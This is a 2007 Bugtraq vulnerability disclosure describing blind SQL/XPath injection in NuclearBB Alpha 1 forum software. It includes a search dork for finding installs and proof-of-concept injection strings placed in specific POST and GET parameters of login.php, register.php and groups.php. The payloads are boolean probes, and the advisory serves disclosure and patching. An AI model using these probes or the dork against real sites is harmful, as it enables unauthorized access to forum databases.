Bugtraq mailing list archives
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
From: john () martinelli com
Date: 18 Apr 2007 19:16:26 -0000
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities Vulnerable: NuclearBB Alpha 1 Google d0rk: "This forum is powered by NuclearBB" ============= String Inputs ============= ---------------------------- login.php - $_POST['submit'] ---------------------------- username=xyz password=passxyz submit=Login"+and+"1"="0 -------------------------------- register.php - $_POST['website'] -------------------------------- username=xyz () xyz com email=xyz () xyz com pass1=passwordxyz pass2=passwordxyz website=xyz () xyz com"+and+"1"="0 location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com icq=xyz () xyz com signature=xyz () xyz com coppa_state=over register_submit=Register ---------------------------- register.php - $_POST['aol'] ---------------------------- username=xyz () xyz com email=xyz () xyz com pass1=xyz () xyz com pass2=xyz () xyz com website=xyz () xyz com location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com"+and+"1"="0 icq=xyz () xyz com signature=xyz () xyz com coppa_state=over register_submit=Register ---------------------------------- register.php - $_POST['signature'] ---------------------------------- username=xyz () xyz com email=xyz () xyz com pass1=xyz () xyz com pass2=xyz () xyz com website=xyz () xyz com location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com icq=xyz () xyz com signature=xyz () xyz com"+and+"1"="0 coppa_state=over register_submit=Register ============== Numeric Inputs ============== ----------------------- groups.php - $_GET['g'] ----------------------- http://www.example.com/groups.php?g=1+and+1=0 ------------------------------ register.php - $_POST['email'] ------------------------------ username=xyz () xyz com email=xyz () xyz com+and+1=0 pass1=xyz () xyz com pass2=xyz () xyz com website=xyz () xyz com location=xyz () xyz com msn=xyz () xyz com yahoo=xyz () xyz com aol=xyz () xyz com icq=xyz () xyz com signature=xyz () xyz com coppa_state=over®ister_submit=Register John Martinelli john () martinelli com http://john-martinelli.com April 18th, 2007
Current thread:
- NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities john (Apr 18)